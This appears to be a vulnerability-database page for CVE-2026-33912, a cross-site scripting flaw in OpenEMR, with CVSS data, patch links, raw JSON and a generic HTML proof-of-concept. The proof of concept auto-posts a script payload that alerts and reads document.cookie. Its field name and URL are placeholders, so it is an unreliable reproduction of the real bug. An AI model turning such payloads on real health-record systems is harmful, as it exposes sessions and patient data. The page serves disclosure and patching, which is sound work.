Security Vulnerability Report
CVE-2026-33912 CVSS 5.4 MEDIUM

CVE-2026-33912

Published: 2026-03-25 23:17:10
Last Modified: 2026-03-26 16:24:01

Description

OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0.3, an authenticated attacker could craft a malicious form that, when submitted by a victim, executes arbitrary JavaScript in the victim's browser session. Version 8.0.0.3 patches the issue.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* - VULNERABLE
OpenEMR < 8.0.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- Proof of Concept for CVE-2026-33912 -->
<!-- This script simulates the malicious form submission crafted by an attacker -->
<html>
<body>
<script>
function exploit() {
  // URL of the vulnerable OpenEMR instance form handler
  var targetUrl = "http://target-openemr/openemr/interface/forms/";
  // Malicious payload designed to execute JS in the victim's browser
  var payload = "<script>alert('CVE-2026-33912 - XSS Executed');console.log(document.cookie);<\/script>";
  // Constructing the form data with the injected payload
  var params = "form_action=save&vulnerable_field=" + encodeURIComponent(payload);
  // Sending the request (simulating victim submission)
  fetch(targetUrl, {
    method: "POST",
    headers: { "Content-Type": "application/x-www-form-urlencoded" },
    body: params,
    credentials: "include" // Ensures cookies are sent if victim is logged in
  }).then(response => console.log("Payload sent"))
    .catch(error => console.error("Error:", error));
}
// Automatically trigger or bind to a button click
exploit();
</script>
<h1>OpenEMR XSS PoC</h1>
<p>If you see an alert, the vulnerability is confirmed.</p>
</body>
</html>

References

https://github.com/openemr/openemr/commit/24dd47c3e4936a6ddd064924d17b0273c6ac4b66 (Patch)
https://github.com/openemr/openemr/commit/ae2a9e5edb8c88b9b0dff5969fd3aa98225f047e (Patch)
https://github.com/openemr/openemr/releases/tag/v8_0_0_3 (Product)
https://github.com/openemr/openemr/security/advisories/GHSA-cpph-949w-w79v (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-33912",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-25T23:17:10.497",
    "lastModified": "2026-03-26T16:24:01.077",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0.3, an authenticated attacker could craft a malicious form that, when submitted by a victim, executes arbitrary JavaScript in the victim's browser session. Version 8.0.0.3 patches the issue."
      },
      {
        "lang": "es",
        "value": "OpenEMR es una aplicación gratuita y de código abierto de registros de salud electrónicos y gestión de prácticas médicas. Antes de la versión 8.0.0.3, un atacante autenticado podría crear un formulario malicioso que, al ser enviado por una víctima, ejecuta JavaScript arbitrario en la sesión del navegador de la víctima. La versión 8.0.0.3 corrige el problema."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-79"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "8.0.0.3",
                "matchCriteriaId": "E3E098AF-42A1-4798-85A7-80052F19F809"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/openemr/openemr/commit/24dd47c3e4936a6ddd064924d17b0273c6ac4b66", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/openemr/openemr/commit/ae2a9e5edb8c88b9b0dff5969fd3aa98225f047e", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/openemr/openemr/releases/tag/v8_0_0_3", "source": "[email protected]", "tags": ["Product"]},
      {"url": "https://github.com/openemr/openemr/security/advisories/GHSA-cpph-949w-w79v", "source": "[email protected]", "tags": ["Vendor Advisory"]}
    ]
  }
}